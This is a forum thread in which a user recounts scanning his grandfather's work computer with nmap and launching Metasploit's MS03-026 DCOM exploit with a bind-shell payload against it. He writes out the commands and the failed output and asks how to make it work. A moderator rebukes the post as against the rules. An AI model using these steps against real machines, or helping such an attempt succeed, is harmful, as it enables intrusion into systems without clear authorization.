Metasploit Question - ms03_026_dcom - shell_bind_tcp

[>Dart>]

Alright. I finally had some free time today. My grandfather wanted me put some work into a project that I have been working on for his company. (A inventory Access database). Usually I just go into his office, (He always leaves his computer logged on) and copy it to a flash drive and move it over to my XP box and do the work.

But today i was tired and feeling very lazy lol. I wanted to send it over the network. To my dismay I haven't set up any type of SMB shares or a SFTP/SCP system like I have done at my house (I SFTP my files over the internet when I need something). So I started thinking..."What's another way I could pull it over over the network...?" And then it hit me! Hack it! (Maybe not the most conventional method).

After doing a lil research I figured out that I assume Metasploit would be the answer. I've never worked with Metasploit before, so I thought this would be a good and worth while opportunity. I told my grandfather what i was planning and he said "Fine, but if you break anything, you better fix it by the time I need to get on there again." That's what he says about everything lol.

After googling my eyes out and making notes in notepad. I downloaded Metasploit and updated it. (version 3.4.2). I'm not really sure what i'm doing and kinda playing it by ear, if anyone has any improvements, please speak up.

My specs: I'm running a wireless Windows XP SP3 fully patched box with Firewall off for testing. Hes running a wired Windows XP SP3 box with Firewall on and eh...maybe updates a week or so old (i think Automatic Windows Update is enabled). We are the only computers on the network. (maybe a VM occasionally) our IP scheme is 192.168.1.1/24. The router is a old 100Mbit 802.11b Linksys running Standard Linksys firmware. Internet is a dynamic IP Comcast cable modem (cheapest plan).

I made sure he was on the network and brought up my rough notes and got to work.

I loaded up Windows and a Command Prompt and ran nmap and did a:

Code:

nmap -sP 192.168.1.1/24

this produced the 3 hosts.
- Me (192.168.1.100)
- Mr. Linksys Router (192.168.1.1)
- Grandfathers Computer (192.168.1.102)
(Not sure what happened to 192.168.1.101)

I did a ipconfig in another window and confirmed my IP (192.168.1.100). Alright sounds like 192.168.1.102 is my target. Then I decided to do a port scan:

Code:

nmap -sT 192.168.1.102

It said that:
- 999 filtered port
- 139/tcp - open - netbios-ssn

Ok. I think I have enough information for the attack. The IP and a Port to attack. I think thats the info I need?

I fired up Metasploit and started to run commands. The most popular exploit i could find in the hour or so of searching was the RPC DCOM exploit. It says XP comptable so I decided to try it:

Code:

use exploit/windows/dcerpc/ms03_026_dcom

It took it ok. Good. Then I ran the next command:

Code:

show options

It said I need to set 2 properties, RHOST for host and RPORT for port. I got this info using nmap. I set these 2 values:

Code:

set RHOST 192.168.1.102
set RPORT 139

Im not sure for a payload...I picked a popular one i read about randomly:

Code:

set PAYLOAD windows/shell_bind_tcp

I tried check but it says it was not supported...oh well.

I ran another nmap scan to make sure everything was still the same, it was.

Then I launched the exploit.

Code:

exploit

And got some interesting feed back:

[*] Started bind handler[*] trying target Windows NT SP3-6a/2000/XP/2003 Universal...[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:1.1@ncacn_ip_tcp:192.168.1.102[139] ...
[-] Exploit exception: Invalid packet. DCERPC response packet is incomplete[*] Exploit completed, but no session was created.

I'm guessing it did not work??? Does that mean his computer is patched? Or did I do something wrong? is there any tweaks that would make it work?

I'm going to research it a bit more and maybe play with different payloads. I'm guessing his system is patched. It was a fun experiment, but in the end...back to the flash drive.

I figure, progress was made, i figured out what does not work.

[Archangel-Amael]

My grandfather wanted me put some work into a project that I have been working on for his company. (A inventory Access database). Usually I just go into his office, (He always leaves his computer logged on) and copy it to a flash drive and move it over to my XP box and do the work.
But today i was tired and feeling very lazy lol. I wanted to send it over the network. To my dismay I haven't set up any type of SMB shares or a SFTP/SCP system like I have done at my house (I SFTP my files over the internet when I need something). So I started thinking..."What's another way I could pull it over over the network...?" And then it hit me! Hack it! (Maybe not the most conventional method).
After doing a lil research I figured out that I assume Metasploit would be the answer. I've never worked with Metasploit before, so I thought this would be a good and worth while opportunity. I told my grandfather what i was planning and he said "Fine, but if you break anything, you better fix it by the time I need to get on there again." That's what he says about everything lol.
After googling my eyes out and making notes in notepad. I downloaded Metasploit and updated it. (version 3.4.2). I'm not really sure what i'm doing and kinda playing it by ear, if anyone has any improvements, please speak up.

I mean really? You have been here long enough to know the rules, and the types of posts we tolerate. It looks to me like you should leave grand-pa's computer alone. I mean "That's what he says about everything lol", come on man.

Not only that, but there is no need to download metasploit since it is already included in BT and we don't support your OS here.